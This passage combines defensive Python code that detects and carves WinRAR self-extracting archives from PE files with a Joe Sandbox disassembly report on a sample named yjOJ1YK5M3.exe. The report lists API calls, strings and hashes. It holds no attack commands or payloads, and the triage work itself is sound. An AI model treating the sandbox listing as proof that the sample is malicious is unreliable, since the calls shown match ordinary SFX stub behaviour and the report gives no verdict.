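SFX_MARKERS = ("Software\\WinRAR SFX", "sfxcmd", "sfxpar")  # strings listed in the report
RAR_PREFIX = b"Rar!\x1a\x07"               # assumption: common prefix of RAR marker blocks
RAR4_SIG = RAR_PREFIX + b"\x00"            # RAR 4.x marker block
RAR5_SIG = RAR_PREFIX + b"\x01\x00"        # RAR 5.0 marker block


@dataclass
class SfxTriage:
    markers_found: Dict[str, List[str]]
    rar_offset: Optional[int]
    rar_version: Optional[str]
    carved: bytes = field(default=b"", repr=False)

    @property
    def looks_like_winrar_sfx(self) -> bool:
        return any(self.markers_found.values()) and self.rar_offset is not None


def find_markers(data: bytes) -> Dict[str, List[str]]:
    """Map each marker string to the encodings it appears in. The stub's registry
    and environment calls are the W variants, so UTF-16LE is checked as well."""
    return {m: [enc for enc in ("ascii", "utf-16-le") if m.encode(enc) in data]
            for m in SFX_MARKERS}


def pe_overlay_offset(data: bytes) -> int:
    """End of the last section's raw data, i.e. where appended (overlay) data starts.
    Returns 0 for a buffer that is not a parseable PE so the caller scans everything."""
    try:
        if data[:2] != b"MZ":
            return 0
        pe = struct.unpack_from("<I", data, 0x3C)[0]
        if data[pe:pe + 4] != b"PE\x00\x00":
            return 0
        nsec = struct.unpack_from("<H", data, pe + 6)[0]
        opt_size = struct.unpack_from("<H", data, pe + 20)[0]
        sec_tbl = pe + 24 + opt_size
        end = 0
        for i in range(nsec):  # SizeOfRawData at +16, PointerToRawData at +20
            raw_size, raw_ptr = struct.unpack_from("<II", data, sec_tbl + i * 40 + 16)
            end = max(end, raw_ptr + raw_size)
        return min(end, len(data))
    except struct.error:
        return 0


def find_rar_signature(data: bytes, start: int = 0) -> Tuple[Optional[int], Optional[str]]:
    """Locate the first RAR marker block at or after `start`."""
    pos = data.find(RAR_PREFIX, start)
    while pos != -1:
        if data.startswith(RAR5_SIG, pos):
            return pos, "RAR5"
        if data.startswith(RAR4_SIG, pos):
            return pos, "RAR4"
        pos = data.find(RAR_PREFIX, pos + 1)
    return None, None


def triage_sfx(data: bytes) -> SfxTriage:
    """Look in the overlay first (where an SFX archive lives), then the whole file."""
    off, ver = find_rar_signature(data, pe_overlay_offset(data))
    if off is None:
        off, ver = find_rar_signature(data, 0)
    return SfxTriage(find_markers(data), off, ver, data[off:] if off is not None else b"")


def build_fake_sfx(payload: bytes) -> bytes:
    """Constructed sample: a minimal PE32 with one section holding the wide marker
    strings, followed by `payload` as the overlay. Not the analysed binary."""
    body = b"\x00" * 16 + b"".join(m.encode("utf-16-le") + b"\x00\x00" for m in SFX_MARKERS)
    body += b"\x00" * ((-len(body)) % 0x200)        # pad to file alignment
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew
    opt_size = 0xE0
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = b"\x0b\x01" + b"\x00" * (opt_size - 2)       # PE32 magic, rest zeroed
    raw_ptr = 0x200
    sec = struct.pack("<8sIIIIIIHHI", b".rdata\x00\x00", len(body), 0x1000,
                      len(body), raw_ptr, 0, 0, 0, 0, 0x40000040)
    hdr = dos + b"PE\x00\x00" + coff + opt + sec
    return bytes(hdr) + b"\x00" * (raw_ptr - len(hdr)) + body + payload


if __name__ == "__main__":
    result = triage_sfx(build_fake_sfx(RAR5_SIG + b"\x33" * 64))
    print(result.markers_found, result.rar_version, hex(result.rar_offset))
    # result.carved can be written to disk and listed with an archiver (7z l / unrar l)
```

Scanning from the overlay first matters because the RAR prefix can also occur inside the stub's own code or data; a hit there would carve garbage. If the file is not a well-formed PE the helper falls back to scanning from offset 0, so a bare or damaged archive is still found. The result only claims "looks like WinRAR SFX" when both the marker strings and an archive are present, which is the combination this report shows.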
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0029ECE0,00000000,?,0029EC80,00000000,002B6F40,0000000C,0029EDD7,00000000,00000002), ref: 0029ED4F
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0029ED62
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0029ECE0,00000000,?,0029EC80,00000000,002B6F40,0000000C,0029EDD7,00000000,00000002), ref: 0029ED85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 078f0ae4d16bf10f4b8bab1ac5e09b37d2ba5270f311e779ec3defac7591985c
                                        • Instruction ID: 4f54c6ae2a288691594ba71b88bc6968cf40622e88838b6b46a7bdbcbe2e3e20
                                        • Opcode Fuzzy Hash: 078f0ae4d16bf10f4b8bab1ac5e09b37d2ba5270f311e779ec3defac7591985c
                                        • Instruction Fuzzy Hash: 74F03C70A20219FBCF159FA4EC09BAEBFB9EB09725F110168E805A2250CF354A90CB90
                                        APIs
                                        • SleepConditionVariableCS.KERNELBASE(?,002962BB,00000064), ref: 00296341
                                        • LeaveCriticalSection.KERNEL32(002C60E0,?,?,002962BB,00000064,?,?,?,?,00000000,002AA75D,000000FF), ref: 0029634B
                                        • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,002962BB,00000064,?,?,?,?,00000000,002AA75D,000000FF), ref: 0029635C
                                        • EnterCriticalSection.KERNEL32(002C60E0,?,002962BB,00000064,?,?,?,?,00000000,002AA75D,000000FF), ref: 00296363
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                        • String ID: `,
                                        • API String ID: 3269011525-3004470232
                                        • Opcode ID: 7e96ceb69f04e12a0baf9517aaf4daf73e52878ce89a98a183bd025f756088e4
                                        • Instruction ID: 46258e40043828622efb823900a1380cafd6bf6e4ef4d307be537b195fd2f1f5
                                        • Opcode Fuzzy Hash: 7e96ceb69f04e12a0baf9517aaf4daf73e52878ce89a98a183bd025f756088e4
                                        • Instruction Fuzzy Hash: 3AE04831661234FFCB111F90FC0DF9D7F68FB06B91B154155F90AB6160CB6259209BD9
                                        APIs
                                          • Part of subcall function 00286C5E: __EH_prolog3_GS.LIBCMT ref: 00286C65
                                          • Part of subcall function 00286C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00286C9A
                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002850B3
                                        • GetProcAddress.KERNEL32(002C51F8,CryptUnprotectMemory), ref: 002850C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AddressProc$DirectoryH_prolog3_System
                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                        • API String ID: 270589589-1753850145
                                        • Opcode ID: f236efca2b80c38e3d61f671288f7c66a46484334425ce1e35e7fa91e5721f50
                                        • Instruction ID: 9bf38c890ba58e165a612127b41a27eb4a334f3cbe9119fa61f9a9419266fc62
                                        • Opcode Fuzzy Hash: f236efca2b80c38e3d61f671288f7c66a46484334425ce1e35e7fa91e5721f50
                                        • Instruction Fuzzy Hash: 12E04F74821B12DFD7306F74EC0D7467ED46F1B704F20882EA4D993580DEB5E4608B50
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AdjustPointer$_abort
                                        • String ID:
                                        • API String ID: 2252061734-0
                                        • Opcode ID: e46993260421128de9247c2f16bb29d235999988a5b09e7bcfe7cfe1d7a586cd
                                        • Instruction ID: e86b09fa13eff71e831df7ff255a397b6d5e39054d4c1aff36dea9e8f34e4821
                                        • Opcode Fuzzy Hash: e46993260421128de9247c2f16bb29d235999988a5b09e7bcfe7cfe1d7a586cd
                                        • Instruction Fuzzy Hash: E751E272A21202AFEF289F58D845BBAB3A4FF41320F14452DEC0547291E772ECE4CB90
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027F3C5
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,0027B749,?,?,?,?,?,?), ref: 0027F450
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 0027F4A7
                                        • SetFileTime.KERNEL32(?,?,?,?), ref: 0027F569
                                        • CloseHandle.KERNEL32(?), ref: 0027F570
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: File$Create$CloseH_prolog3_HandleTime
                                        • String ID:
                                        • API String ID: 4002707884-0
                                        • Opcode ID: 23de5c95c50f85762cb20b2c232ed9bb64cf718be82d7f90819ffa5119b2bdce
                                        • Instruction ID: 3b6dbb7f6532a97994e9ca23b0559c4a44a3528c86b9677e2014525806b6aaf8
                                        • Opcode Fuzzy Hash: 23de5c95c50f85762cb20b2c232ed9bb64cf718be82d7f90819ffa5119b2bdce
                                        • Instruction Fuzzy Hash: 4E51D330A24249ABDF10DFE8D945BEEBBB5AF09310F244129F545F72C0D7349A55CB24
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 002A2BE9
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002A2C0C
                                          • Part of subcall function 002A040E: RtlAllocateHeap.NTDLL(00000000,0029535E,?,?,00296C16,?,?,?,?,?,00295269,0029535E,?,?,?,?), ref: 002A0440
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002A2C32
                                        • _free.LIBCMT ref: 002A2C45
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002A2C54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 08e08cbdfe34ef24ed84dc1ffe2c85a54c410c9b86697cd345eb4afc0134886e
                                        • Instruction ID: c5819671ccc1209c45cbbb22366518a2db84e675265e5db82acc277284c5d076
                                        • Opcode Fuzzy Hash: 08e08cbdfe34ef24ed84dc1ffe2c85a54c410c9b86697cd345eb4afc0134886e
                                        • Instruction Fuzzy Hash: 8101F772721211BF37251A7E6C8CC7F7A6EDEC7B71326012AF908D2111EE60CC1595B0
                                        APIs
                                        • GetLastError.KERNEL32(0029535E,0029535E,?,002A01D8,002A0451,?,?,00296C16,?,?,?,?,?,00295269,0029535E,?), ref: 002A008E
                                        • _free.LIBCMT ref: 002A00C3
                                        • _free.LIBCMT ref: 002A00EA
                                        • SetLastError.KERNEL32(00000000,?,0029535E), ref: 002A00F7
                                        • SetLastError.KERNEL32(00000000,?,0029535E), ref: 002A0100
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 905088d94657b7d3ff0842128107454075517907dca717570609524011097ca2
                                        • Instruction ID: 9bf425394de4498842212c6ede9adfe660bf522a417077db25dbfc6949f379df
                                        • Opcode Fuzzy Hash: 905088d94657b7d3ff0842128107454075517907dca717570609524011097ca2
                                        • Instruction Fuzzy Hash: C40128721747026787222B747DCAF2B256ADFC3371B310129F505A3592EEB08C755520
                                        APIs
                                        • _free.LIBCMT ref: 002A34C7
                                          • Part of subcall function 002A03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?), ref: 002A03EA
                                          • Part of subcall function 002A03D4: GetLastError.KERNEL32(?,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?,?), ref: 002A03FC
                                        • _free.LIBCMT ref: 002A34D9
                                        • _free.LIBCMT ref: 002A34EB
                                        • _free.LIBCMT ref: 002A34FD
                                        • _free.LIBCMT ref: 002A350F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 6fd48032457e0f4fd4d57580899d482a18dd49eea346bacd232feab3a8a67151
                                        • Instruction ID: 2115b58eeaf54168045691fadefb375f23ef9fe3b891548051a86494187df67a
                                        • Opcode Fuzzy Hash: 6fd48032457e0f4fd4d57580899d482a18dd49eea346bacd232feab3a8a67151
                                        • Instruction Fuzzy Hash: 77F01D32528301BB8A20EF68F8CAC1A77D9AB467107690C46F508E7901CFB4FDA0CB60
                                        APIs
                                        • _free.LIBCMT ref: 0029F7DE
                                          • Part of subcall function 002A03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?), ref: 002A03EA
                                          • Part of subcall function 002A03D4: GetLastError.KERNEL32(?,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?,?), ref: 002A03FC
                                        • _free.LIBCMT ref: 0029F7F0
                                        • _free.LIBCMT ref: 0029F803
                                        • _free.LIBCMT ref: 0029F814
                                        • _free.LIBCMT ref: 0029F825
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 66a1eb3da41fefb1d00eb818eb50e5e4f39fdc6e30c5e0100c08f199228ce4a7
                                        • Instruction ID: ff56a816033ab66e92efc22a53ab3dcf38ded025973d5aa4b621f762dd5ed719
                                        • Opcode Fuzzy Hash: 66a1eb3da41fefb1d00eb818eb50e5e4f39fdc6e30c5e0100c08f199228ce4a7
                                        • Instruction Fuzzy Hash: 69F089704203109BDF51AF24BD4EC54BFA1FB1AB243010A9BF515A7671CB7A5861CF81
                                        APIs
                                          • Part of subcall function 00281309: __EH_prolog3.LIBCMT ref: 00281310
                                          • Part of subcall function 00281309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002817FB,?,?,\\?\,D946AC94,?,?,?,00000000,002AA279,000000FF), ref: 00281319
                                          • Part of subcall function 00281AD1: __EH_prolog3_GS.LIBCMT ref: 00281AD8
                                          • Part of subcall function 0027F763: __EH_prolog3_GS.LIBCMT ref: 0027F76A
                                          • Part of subcall function 0027F58B: __EH_prolog3_GS.LIBCMT ref: 0027F592
                                          • Part of subcall function 0027F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,0027A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0027F5A8
                                          • Part of subcall function 0027F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049), ref: 0027F5EB
                                        • SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00292137
                                        • MoveFileW.KERNEL32(?,?), ref: 002922BE
                                        • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 002922D8
                                          • Part of subcall function 002814CC: __EH_prolog3_GS.LIBCMT ref: 002814D3
                                        Similarity
                                        • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                                        • String ID: .tmp
                                        • API String ID: 1688541384-2986845003
                                        • Opcode ID: f7a08762affa912a27f8e5f9501f31eba82df4adbe7a4a3bdaada49cc1c40537
                                        • Instruction ID: a127971ef5725a5654508f60d31d3d517091b0c274249a495b53c10e1e59079b
                                        • Opcode Fuzzy Hash: f7a08762affa912a27f8e5f9501f31eba82df4adbe7a4a3bdaada49cc1c40537
                                        • Instruction Fuzzy Hash: 06C1DF71C20268DADF65EFA4C885BDDB7B8BF09300F5041EAE54DA2241DB345BA9CF20
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\yjOJ1YK5M3.exe,00000104), ref: 0029EE6A
                                        • _free.LIBCMT ref: 0029EF35
                                        • _free.LIBCMT ref: 0029EF3F
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                        • API String ID: 2506810119-1307394207
                                        • Opcode ID: 87744945d10a3d15a2d62166f86e1192b86e07d82e38d6ed8eeebd0c25b98046
                                        • Instruction ID: 12cbf9ed87ad7d21eb250f4486e746ac50477b72fa59e5d76eb91ddd24fd6b6f
                                        • Opcode Fuzzy Hash: 87744945d10a3d15a2d62166f86e1192b86e07d82e38d6ed8eeebd0c25b98046
                                        • Instruction Fuzzy Hash: 86317E71A24258AFCF21DF999C89D9EBBFCEF89310F1540A6F80497201DBB19E54CB91
                                        APIs
                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00299E7B
                                        • _abort.LIBCMT ref: 00299F86
                                        Similarity
                                        • API ID: EncodePointer_abort
                                        • String ID: MOC$RCC
                                        • API String ID: 948111806-2084237596
                                        • Opcode ID: cf42a125538c90ff095cfb4285b8fa16d63878b8c77385c1230bb4c9523366a3
                                        • Instruction ID: e2e7611fa1ef34051d12640ad05645806a3f83fc6bc8637d2aeef64c2a39b5b0
                                        • Opcode Fuzzy Hash: cf42a125538c90ff095cfb4285b8fa16d63878b8c77385c1230bb4c9523366a3
                                        • Instruction Fuzzy Hash: 9D414A7191020AAFCF16DF98CD81AEEBBB5BF48314F148159FA05A7251D33699A0DF50
                                        APIs
                                        • __fprintf_l.LIBCMT ref: 0028340E
                                        • _strncpy.LIBCMT ref: 00283459
                                          • Part of subcall function 002889ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,002BE088,?,00000007,002833E2,?,?,00000050,D946AC94), ref: 00288A0A
                                        Similarity
                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                        • String ID: $%s$@%s
                                        • API String ID: 562999700-834177443
                                        • Opcode ID: 46d7d504bc61f1788293a40ddf78204d307710c592eb832b8491867f2959d013
                                        • Instruction ID: cfcefa6063db6870aa0014da81ebd7d1a7986c7bd6d1fea58bfb4c0890ec8a5e
                                        • Opcode Fuzzy Hash: 46d7d504bc61f1788293a40ddf78204d307710c592eb832b8491867f2959d013
                                        • Instruction Fuzzy Hash: 2121D27652170EABDB11EEA8CD45EAE7BE8FB05700F040125FA10D72C1DB31EA24CB60
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0028F8F7
                                          • Part of subcall function 00271E44: GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                          • Part of subcall function 00271E44: SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        • EndDialog.USER32(?,00000001), ref: 0028F99F
                                        • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 0028F9E1
                                        Similarity
                                        • API ID: ItemText$DialogH_prolog3_Window
                                        • String ID: ASKNEXTVOL
                                        • API String ID: 2321058237-3402441367
                                        • Opcode ID: 060a8e4db52d4c356ec3edbafb731f4731aa119319fd0188879ee002221a0208
                                        • Instruction ID: 0294f5c1e4ac3680fd0d77fadf53780f83d60bf6742362dd66252f1605eefa63
                                        • Opcode Fuzzy Hash: 060a8e4db52d4c356ec3edbafb731f4731aa119319fd0188879ee002221a0208
                                        • Instruction Fuzzy Hash: C2218F35622115BFDB50FFA8DE4AFA937A8AF0A300F104025F5059B2E1C770AA74CF21
                                        APIs
                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0027FEBD,00000008,00000004,00282D42,?,?,?,?,00000000,0028ABB6,?), ref: 00287484
                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0027FEBD,00000008,00000004,00282D42,?,?,?,?,00000000), ref: 0028748E
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0027FEBD,00000008,00000004,00282D42,?,?,?,?,00000000), ref: 0028749E
                                        Strings
                                        • Thread pool initialization failed., xrefs: 002874B6
                                        Similarity
                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                        • String ID: Thread pool initialization failed.
                                        • API String ID: 3340455307-2182114853
                                        • Opcode ID: b2c5d481dc857af4fb9be199d0bcee0e9ec04b14b492157b27070003ed5d4664
                                        • Instruction ID: f77b5dbea7b536dba642ac140e0ba1087693646858dd631808c47322c6b6efe6
                                        • Opcode Fuzzy Hash: b2c5d481dc857af4fb9be199d0bcee0e9ec04b14b492157b27070003ed5d4664
                                        • Instruction Fuzzy Hash: 9E110AB1615709AFD3316F769C889A7FFECEB55744F20482EF1DAC3240DAB099908B50
                                        Similarity
                                        • API ID:
                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                        • API String ID: 0-56093855
                                        • Opcode ID: 2aeb3759577ad1268be4927c3760b7bea2ef68d6654b1348485e20206bfa9836
                                        • Instruction ID: 9482f93cd117057b89b529a8ad7d72a99c8ba6df40f5b688043b73fa867001b5
                                        • Opcode Fuzzy Hash: 2aeb3759577ad1268be4927c3760b7bea2ef68d6654b1348485e20206bfa9836
                                        • Instruction Fuzzy Hash: F4117C30224311ABDF14AF19FC48E267BE8E75A381B040929F646D3220D671E8E6DF61
                                        APIs
                                          • Part of subcall function 00283EAA: _swprintf.LIBCMT ref: 00283EEA
                                          • Part of subcall function 00283EAA: _strlen.LIBCMT ref: 00283F0B
                                          • Part of subcall function 00283EAA: SetDlgItemTextW.USER32(?,002B919C,?), ref: 00283F64
                                          • Part of subcall function 00283EAA: GetWindowRect.USER32(?,?), ref: 00283F9A
                                          • Part of subcall function 00283EAA: GetClientRect.USER32(?,?), ref: 00283FA6
                                        • GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                        • SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        Similarity
                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                        • String ID: 0$gI)
                                        • API String ID: 2622349952-1724040823
                                        • Opcode ID: e52e7a024fe4d91dfd235a99ef1594d9dbe44c38a4b0df0a057813b636041c2d
                                        • Instruction ID: acf19a1b8188c855780c07e48d6b7001f3c048f8b753008b8c5cf1c9b077b4b2
                                        • Opcode Fuzzy Hash: e52e7a024fe4d91dfd235a99ef1594d9dbe44c38a4b0df0a057813b636041c2d
                                        • Instruction Fuzzy Hash: EDF0AF30524249A7DF251F65ED0AEEA3B98AF15344F088154FC4C545E1C7B4CAB0DF50
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0029A843,00000000,?,002C6150,?,?,?,0029A9E6,00000004,InitializeCriticalSectionEx,002AF7F4,InitializeCriticalSectionEx), ref: 0029A89F
                                        • GetLastError.KERNEL32(?,0029A843,00000000,?,002C6150,?,?,?,0029A9E6,00000004,InitializeCriticalSectionEx,002AF7F4,InitializeCriticalSectionEx,00000000,?,0029A79D), ref: 0029A8A9
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0029A8D1
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID: api-ms-
                                        • API String ID: 3177248105-2084034818
                                        • Opcode ID: c7d51a48a92ac0eacb8e682a47d57789b97a480b4205aa083edeb13f85b1e042
                                        • Instruction ID: 90c9f5474c46aaf98d0cf034eb7b014d30e279af869eccd9e04208d8543f9c45
                                        • Opcode Fuzzy Hash: c7d51a48a92ac0eacb8e682a47d57789b97a480b4205aa083edeb13f85b1e042
                                        • Instruction Fuzzy Hash: DFE04F30290306B7EF201FA0ED0AB183A59AF11B91F200430FD0DA84E0DF619825AAD6
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                        • Instruction ID: f879e9fd6a474630c1c6f78ddcf1301a6910e1a85b8911796538ac3d58448d12
                                        • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                        • Instruction Fuzzy Hash: 7CA14971E207879FEB11CF28C8D17AEBBE4EF57350F144169E5859B282CA788D51CB90
                                        APIs
